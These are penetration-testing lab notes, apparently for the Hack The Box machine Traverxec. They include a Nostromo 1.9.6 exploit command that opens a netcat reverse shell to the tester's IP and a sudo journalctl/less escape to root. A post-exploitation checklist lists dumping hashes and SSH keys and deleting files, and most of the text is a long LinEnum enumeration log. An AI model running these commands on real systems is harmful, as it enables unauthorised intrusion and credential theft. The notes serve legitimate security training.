10.10.10.X

Web Services

cat nhttpd.conf

# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]
logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]
user www-data

# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]
/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www

Exploitation

Service Exploited: Nostromo 1.9.6
Vulnerability Type: RCE
Exploit POC: https://www.exploit-db.com/exploits/47837
Description:

Discovery of Vulnerability
nmap

Exploit Code Used
python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.7 4444"

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Network

IPConfig\IFConfig Network Processes ARP DNS Route

Users & Groups

Users Groups

Installed Applications

Installed Applications

Priv Escalation

Service Exploited: less Pager
Vulnerability Type: GTFObin
Exploit POC:
Description:

Scheduled Tasks
server-stats.sh

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Proof\Flags\Other

Service Exploited: less Pager
Vulnerability Type: GTFObin
Exploit POC:
Description:

Discovery of Vulnerability

Exploit Code Used
Shrink Window, run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service, expand window, type !/bin/bash and hit Enter

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning

WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadaver
☐ droopescan
☐ joomscan
☐ LFI\RFI Test

Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux

Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation

Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggester.sh
☐ unix-privesc-check.py

Windows
☐ wpc.exe
☐ windows-exploit-suggester.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account

Windows
☐ List of exploits

Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files

Log Book

information:
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20)

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

[-] Hostname:
traverxec

### USER/GROUP ##########################################

[-] Current user/group info:
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Thu Nov 21 04:25:58 -0500 2019
david pts/1 10.10.14.7 Wed Aug 26 23:33:00 -0400 2020

[-] Who else is logged on:
23:36:59 up 35 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
david pts/1 10.10.14.7 23:33 3.00s 0.03s 0.00s /bin/bash ./LinEnum.sh -t

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus)
gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
david:x:1000:1000:david,,,:/home/david:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Oct 25 2019 .
drwxr-xr-x 18 root root 4.0K Oct 25 2019 ..
drwx--x--x 5 david david 4.0K Aug 26 23:36 david

[-] Files owned by our user:
-rwxr-xr-x 1 david david 46631 Jul 13 14:54 /home/david/LinEnum.sh
-rw-r--r-- 1 david david 5059 Aug 26 23:37 /home/david/output.txt
-rw-r--r-- 1 david david 807 Oct 25 2019 /home/david/.profile
-rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/authorized_keys
-rw------- 1 david david 1766 Oct 25 2019 /home/david/.ssh/id_rsa
-rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/id_rsa.pub
-rw-r--r-- 1 david david 402 Oct 25 2019 /home/david/public_www/index.html
-rw-r--r-- 1 david david 1915 Oct 25 2019 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
-rw-r--r-- 1 david david 45 Oct 25 2019 /home/david/public_www/protected-file-area/.htaccess
-rwx------ 1 david david 363 Oct 25 2019 /home/david/bin/server-stats.sh
-r-------- 1 david david 802 Oct 25 2019 /home/david/bin/server-stats.head
-rw-r--r-- 1 david david 220 Oct 25 2019 /home/david/.bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 2019 /home/david/.bashrc

[-] Hidden files:
-rw-r--r-- 1 root root 0 Aug 26 23:01 /run/network/.ifstate.lock
-rw-r--r-- 1 david david 807 Oct 25 2019 /home/david/.profile
-rw-r--r-- 1 david david 45 Oct 25 2019 /home/david/public_www/protected-file-area/.htaccess
-rw-r--r-- 1 david david 220 Oct 25 2019 /home/david/.bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 2019 /home/david/.bashrc
-rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 807 Apr 18 2019 /etc/skel/.profile
-rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 3526 Apr 18 2019 /etc/skel/.bashrc
-rw------- 1 root root 0 Oct 25 2019 /etc/.pwd.lock
-rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Jun 23 2019 /etc/cron.hourly/.placeholder
-rw-r--r-- 1 root root
0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root bin 41 Oct 25 2019 /var/nostromo/conf/.htpasswd

[-] World-readable files within /home:
-rwxr-xr-x 1 david david 46631 Jul 13 14:54 /home/david/LinEnum.sh
-rw-r--r-- 1 david david 7198 Aug 26 23:37 /home/david/output.txt
-rw-r--r-- 1 david david 807 Oct 25 2019 /home/david/.profile
-rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/authorized_keys
-rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/id_rsa.pub
-rw-r--r-- 1 david david 402 Oct 25 2019 /home/david/public_www/index.html
-rw-r--r-- 1 david david 1915 Oct 25 2019 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
-rw-r--r-- 1 david david 45 Oct 25 2019 /home/david/public_www/protected-file-area/.htaccess
-rw-r--r-- 1 david david 220 Oct 25 2019 /home/david/.bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 2019 /home/david/.bashrc

[-] Home directory contents:
total 92K
drwx--x--x 5 david david 4.0K Aug 26 23:36 .
drwxr-xr-x 3 root root 4.0K Oct 25 2019 ..
lrwxrwxrwx 1 root root 9 Oct 25 2019 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 2019 .bash_logout
-rw-r--r-- 1 david david 3.5K Oct 25 2019 .bashrc
drwx------ 2 david david 4.0K Oct 25 2019 bin
-rwxr-xr-x 1 david david 46K Jul 13 14:54 LinEnum.sh
-rw-r--r-- 1 david david 7.9K Aug 26 23:37 output.txt
-rw-r--r-- 1 david david 807 Oct 25 2019 .profile
drwxr-xr-x 3 david david 4.0K Oct 25 2019 public_www
drwx------ 2 david david 4.0K Oct 25 2019 .ssh
-r--r----- 1 root david 33 Oct 25 2019 user.txt

[-] SSH keys/host information found in the following locations:
-rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/authorized_keys
-rw------- 1 david david 1766 Oct 25 2019 /home/david/.ssh/id_rsa
-rw-r--r-- 1 david david 397 Oct 25 2019 /home/david/.ssh/id_rsa.pub

### ENVIRONMENTAL #######################################

[-] Environment information:
SHELL=/bin/bash
PWD=/home/david
LOGNAME=david
XDG_SESSION_TYPE=tty
HOME=/home/david
LANG=en_US.UTF-8
SSH_CONNECTION=10.10.14.7 45374 10.10.10.165 22
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=david
SHLVL=1
XDG_SESSION_ID=2
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=10.10.14.7 45374 22
PATH=/home/david/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
MAIL=/var/mail/david
SSH_TTY=/dev/pts/1
_=/usr/bin/env

[-] Path information:
/home/david/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
lrwxrwxrwx 1 root root 7 Oct 25 2019 /bin -> usr/bin
drwx------ 2 david david 4096 Oct 25 2019 /home/david/bin
drwxr-xr-x 2 root root 20480 Nov 12 2019 /usr/bin
drwxr-xr-x 2 root root 4096 May 13 2019 /usr/games
drwxr-xr-x 2 root root 4096 Oct 25 2019 /usr/local/bin
drwxr-xr-x 2 root root 4096 Oct 25 2019 /usr/local/games

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash

[-] Current umask value:
0022
u=rwx,g=rx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage
information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################

[-] Cron jobs:
-rw-r--r-- 1 root root 1042 Jun 23 2019 /etc/crontab

/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Oct 25 2019 .
drwxr-xr-x 73 root root 4096 Nov 12 2019 ..
-rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder

/etc/cron.daily:
total 36
drwxr-xr-x 2 root root 4096 Oct 25 2019 .
drwxr-xr-x 73 root root 4096 Nov 12 2019 ..
-rwxr-xr-x 1 root root 1478 May 28 2019 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Apr 18 2019 dpkg
-rwxr-xr-x 1 root root 377 Aug 28 2018 logrotate
-rwxr-xr-x 1 root root 1123 Feb 10 2019 man-db
-rwxr-xr-x 1 root root 249 Sep 27 2017 passwd
-rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Oct 25 2019 .
drwxr-xr-x 73 root root 4096 Nov 12 2019 ..
-rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Oct 25 2019 .
drwxr-xr-x 73 root root 4096 Nov 12 2019 ..
-rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Oct 25 2019 .
drwxr-xr-x 73 root root 4096 Nov 12 2019 ..
-rwxr-xr-x 1 root root 813 Feb 10 2019 man-db
-rw-r--r-- 1 root root 102 Jun 23 2019 .placeholder

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2020-08-27 00:00:00 EDT 22min left Wed 2020-08-26 23:01:55 EDT 35min ago logrotate.timer logrotate.service
Thu 2020-08-27 00:00:00 EDT 22min left Wed 2020-08-26 23:01:55 EDT 35min ago man-db.timer man-db.service
Thu 2020-08-27 06:08:05 EDT 6h left Wed 2020-08-26 23:01:55 EDT 35min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2020-08-27 06:43:28 EDT 7h left Wed 2020-08-26 23:01:55 EDT 35min ago apt-daily.timer apt-daily.service
Thu 2020-08-27 23:16:55 EDT 23h left Wed 2020-08-26 23:16:55 EDT 20min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
5 timers listed.
### NETWORKING ##########################################

[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:87:37 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.165/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever

[-] ARP history:
10.10.10.2 dev eth0 lladdr 00:50:56:b9:f9:ab REACHABLE

[-] Nameserver(s):
nameserver 10.211.55.1

[-] Default route:
default via 10.10.10.2 dev eth0 onlink

[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*

[-] Listening UDP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port

### SERVICES #############################################

[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 103784 10004 ? Ss 23:01 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 23:01 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 23:01 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 23:01 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 23:01 0:00 [kworker/0:0H-kblockd]
root 7 0.0 0.0 0 0 ? I 23:01 0:00 [kworker/u2:0-events_unbound]
root 8 0.0 0.0 0 0 ? I< 23:01 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 23:01 0:00 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 23:01 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? I 23:01 0:00 [rcu_bh]
root 12 0.0 0.0 0 0 ? S 23:01 0:00 [migration/0]
root 14 0.0 0.0 0 0 ? S 23:01 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 23:01 0:00 [kdevtmpfs]
root 16 0.0 0.0 0 0 ? I< 23:01 0:00 [netns]
root 17 0.0 0.0 0 0 ? S 23:01 0:00 [kauditd]
root 18 0.0 0.0 0 0 ? S 23:01 0:00 [khungtaskd]
root 19 0.0 0.0 0 0 ? S 23:01 0:00 [oom_reaper]
root 20 0.0 0.0 0 0 ?
I< 23:01 0:00 [writeback]
root 21 0.0 0.0 0 0 ? S 23:01 0:00 [kcompactd0]
root 22 0.0 0.0 0 0 ? SN 23:01 0:00 [ksmd]
root 23 0.0 0.0 0 0 ? SN 23:01 0:00 [khugepaged]
root 24 0.0 0.0 0 0 ? I< 23:01 0:00 [crypto]
root 25 0.0 0.0 0 0 ? I< 23:01 0:00 [kintegrityd]
root 26 0.0 0.0 0 0 ? I< 23:01 0:00 [kblockd]
root 27 0.0 0.0 0 0 ? I< 23:01 0:00 [edac-poller]
root 28 0.0 0.0 0 0 ? I< 23:01 0:00 [devfreq_wq]
root 29 0.0 0.0 0 0 ? S 23:01 0:00 [watchdogd]
root 30 0.0 0.0 0 0 ? S 23:01 0:00 [kswapd0]
root 48 0.0 0.0 0 0 ? I< 23:01 0:00 [kthrotld]
root 49 0.0 0.0 0 0 ? S 23:01 0:00 [irq/24-pciehp]
root 50 0.0 0.0 0 0 ? S 23:01 0:00 [irq/25-pciehp]
root 51 0.0 0.0 0 0 ? S 23:01 0:00 [irq/26-pciehp]
root 52 0.0 0.0 0 0 ? S 23:01 0:00 [irq/27-pciehp]
root 53 0.0 0.0 0 0 ? S 23:01 0:00 [irq/28-pciehp]
root 54 0.0 0.0 0 0 ? S 23:01 0:00 [irq/29-pciehp]
root 55 0.0 0.0 0 0 ? S 23:01 0:00 [irq/30-pciehp]
root 56 0.0 0.0 0 0 ? S 23:01 0:00 [irq/31-pciehp]
root 57 0.0 0.0 0 0 ? S 23:01 0:00 [irq/32-pciehp]
root 58 0.0 0.0 0 0 ? S 23:01 0:00 [irq/33-pciehp]
root 59 0.0 0.0 0 0 ? S 23:01 0:00 [irq/34-pciehp]
root 60 0.0 0.0 0 0 ? S 23:01 0:00 [irq/35-pciehp]
root 61 0.0 0.0 0 0 ? S 23:01 0:00 [irq/36-pciehp]
root 62 0.0 0.0 0 0 ? S 23:01 0:00 [irq/37-pciehp]
root 63 0.0 0.0 0 0 ? S 23:01 0:00 [irq/38-pciehp]
root 64 0.0 0.0 0 0 ? S 23:01 0:00 [irq/39-pciehp]
root 65 0.0 0.0 0 0 ? S 23:01 0:00 [irq/40-pciehp]
root 66 0.0 0.0 0 0 ? S 23:01 0:00 [irq/41-pciehp]
root 67 0.0 0.0 0 0 ? S 23:01 0:00 [irq/42-pciehp]
root 68 0.0 0.0 0 0 ? S 23:01 0:00 [irq/43-pciehp]
root 69 0.0 0.0 0 0 ? S 23:01 0:00 [irq/44-pciehp]
root 70 0.0 0.0 0 0 ? S 23:01 0:00 [irq/45-pciehp]
root 71 0.0 0.0 0 0 ? S 23:01 0:00 [irq/46-pciehp]
root 72 0.0 0.0 0 0 ? S 23:01 0:00 [irq/47-pciehp]
root 73 0.0 0.0 0 0 ? S 23:01 0:00 [irq/48-pciehp]
root 74 0.0 0.0 0 0 ? S 23:01 0:00 [irq/49-pciehp]
root 75 0.0 0.0 0 0 ? S 23:01 0:00 [irq/50-pciehp]
root 76 0.0 0.0 0 0 ? S 23:01 0:00 [irq/51-pciehp]
root 77 0.0 0.0 0 0 ?
S 23:01 0:00 [irq/52-pciehp]
root 78 0.0 0.0 0 0 ? S 23:01 0:00 [irq/53-pciehp]
root 79 0.0 0.0 0 0 ? S 23:01 0:00 [irq/54-pciehp]
root 80 0.0 0.0 0 0 ? S 23:01 0:00 [irq/55-pciehp]
root 81 0.0 0.0 0 0 ? I< 23:01 0:00 [ipv6_addrconf]
root 83 0.0 0.0 0 0 ? I 23:01 0:00 [kworker/u2:1-events_unbound]
root 92 0.0 0.0 0 0 ? I< 23:01 0:00 [kstrp]
root 128 0.0 0.0 0 0 ? I< 23:01 0:00 [ata_sff]
root 129 0.0 0.0 0 0 ? I< 23:01 0:00 [mpt_poll_0]
root 130 0.0 0.0 0 0 ? S 23:01 0:00 [scsi_eh_0]
root 131 0.0 0.0 0 0 ? I< 23:01 0:00 [mpt/0]
root 132 0.0 0.0 0 0 ? I< 23:01 0:00 [scsi_tmf_0]
root 133 0.0 0.0 0 0 ? S 23:01 0:00 [scsi_eh_1]
root 134 0.0 0.0 0 0 ? I< 23:01 0:00 [scsi_tmf_1]
root 184 0.0 0.0 0 0 ? I< 23:01 0:00 [kworker/0:1H-kblockd]
root 187 0.0 0.0 0 0 ? S 23:01 0:00 [scsi_eh_2]
root 188 0.0 0.0 0 0 ? I< 23:01 0:00 [scsi_tmf_2]
root 216 0.0 0.0 0 0 ? I< 23:01 0:00 [kworker/u3:0]
root 218 0.0 0.0 0 0 ? S 23:01 0:00 [jbd2/sda1-8]
root 219 0.0 0.0 0 0 ? I< 23:01 0:00 [ext4-rsv-conver]
root 251 0.0 0.8 32184 8236 ? Ss 23:01 0:00 /lib/systemd/systemd-journald
root 268 0.0 0.4 21920 4960 ? Ss 23:01 0:00 /lib/systemd/systemd-udevd
root 354 0.0 0.0 0 0 ? I< 23:01 0:00 [ttm_swap]
root 355 0.0 0.0 0 0 ? S 23:01 0:00 [irq/16-vmwgfx]
systemd+ 408 0.0 0.6 93080 6524 ? Ssl 23:01 0:00 /lib/systemd/systemd-timesyncd
root 410 0.0 0.2 8476 2644 ? Ss 23:01 0:00 /usr/sbin/cron -f
root 414 0.0 0.7 19388 7296 ? Ss 23:01 0:00 /lib/systemd/systemd-logind
message+ 417 0.0 0.4 9076 4416 ? Ss 23:01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
www-data 420 0.0 0.2 7948 2364 ? S 23:01 0:00 /usr/local/sbin/nhttpd
root 423 0.0 0.1 5612 1652 tty1 Ss+ 23:01 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 424 0.0 0.6 15852 7036 ? Ss 23:01 0:00 /usr/sbin/sshd -D
root 583 0.0 1.1 152648 11688 ? Sl 23:01 0:01 /usr/sbin/vmtoolsd
root 631 0.0 1.0 38660 10340 ?
S 23:01 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data 735 0.0 0.2 3736 2836 ? S 23:06 0:00 bash
www-data 752 0.0 0.6 12340 6944 ? S 23:07 0:00 python -c import pty; pty.spawn("/bin/bash")
www-data 753 0.0 0.3 3868 3280 pts/0 Ss+ 23:07 0:00 /bin/bash
root 772 0.0 0.0 0 0 ? I 23:22 0:00 [kworker/0:0-ata_sff]
root 775 0.0 0.0 0 0 ? I 23:27 0:00 [kworker/0:2-ata_sff]
root 776 0.0 0.8 16896 8276 ? Ss 23:32 0:00 sshd: david [priv]
david 779 0.0 0.8 21020 8536 ? Ss 23:32 0:00 /lib/systemd/systemd --user
david 780 0.0 0.2 104952 2264 ? S 23:32 0:00 (sd-pam)
david 788 0.0 0.4 16896 4904 ? S 23:32 0:00 sshd: david@pts/1
david 789 0.0 0.4 8240 4992 pts/1 Ss 23:32 0:00 -bash
root 792 0.0 0.0 0 0 ? I 23:33 0:00 [kworker/0:1-events]
david 805 0.0 0.3 7568 3876 pts/1 S+ 23:36 0:00 /bin/bash ./LinEnum.sh -t
david 806 0.0 0.3 7568 3336 pts/1 S+ 23:36 0:00 /bin/bash ./LinEnum.sh -t
david 807 0.0 0.0 5264 748 pts/1 S+ 23:36 0:00 tee -a
root 893 0.0 0.2 21920 2300 ? S 23:37 0:00 /lib/systemd/systemd-udevd
david 1042 0.0 0.2 7568 2584 pts/1 S+ 23:37 0:00 /bin/bash ./LinEnum.sh -t
david 1043 0.0 0.3 10632 3240 pts/1 R+ 23:37 0:00 ps aux

[-] Process binaries and associated permissions (from above list):
1.2M -rwxr-xr-x 1 root root 1.2M Apr 18 2019 /bin/bash
1.5M -rwxr-xr-x 1 root root 1.5M Aug 20 2019 /lib/systemd/systemd
144K -rwxr-xr-x 1 root root 143K Aug 20 2019 /lib/systemd/systemd-journald
228K -rwxr-xr-x 1 root root 227K Aug 20 2019 /lib/systemd/systemd-logind
56K -rwxr-xr-x 1 root root 55K Aug 20 2019 /lib/systemd/systemd-timesyncd
664K -rwxr-xr-x 1 root root 663K Aug 20 2019 /lib/systemd/systemd-udevd
64K -rwxr-xr-x 1 root root 64K Jan 10 2019 /sbin/agetty
0 lrwxrwxrwx 1 root root 20 Aug 20 2019 /sbin/init -> /lib/systemd/systemd
236K -rwxr-xr-x 1 root root 236K Jun 9 2019 /usr/bin/dbus-daemon
0 lrwxrwxrwx 1 root root 37 Nov 12 2019 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin64/appLoader
72K -r-xr-xr-x 1 root bin 72K Oct 25 2019
/usr/local/sbin/nhttpd
56K -rwxr-xr-x 1 root root 55K Jun 23 2019 /usr/sbin/cron
792K -rwxr-xr-x 1 root root 789K Oct 6 2019 /usr/sbin/sshd
0 lrwxrwxrwx 1 root root 37 Nov 12 2019 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin64/vmtoolsd

[-] /etc/init.d/ binary permissions:
total 120
drwxr-xr-x 2 root root 4096 Nov 12 2019 .
drwxr-xr-x 73 root root 4096 Nov 12 2019 ..
-rwxr-xr-x 1 root root 3740 Mar 30 2019 apparmor
-rwxr-xr-x 1 root root 1232 Mar 23 2019 console-setup.sh
-rwxr-xr-x 1 root root 3059 Jun 23 2019 cron
-rwxr-xr-x 1 root root 2813 Jun 9 2019 dbus
-rwxr-xr-x 1 root root 3809 Jan 10 2019 hwclock.sh
-rwxr-xr-x 1 root root 1479 Oct 29 2018 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Feb 9 2019 kmod
-rwxr-xr-x 1 root root 1364 Oct 10 2018 netfilter-persistent
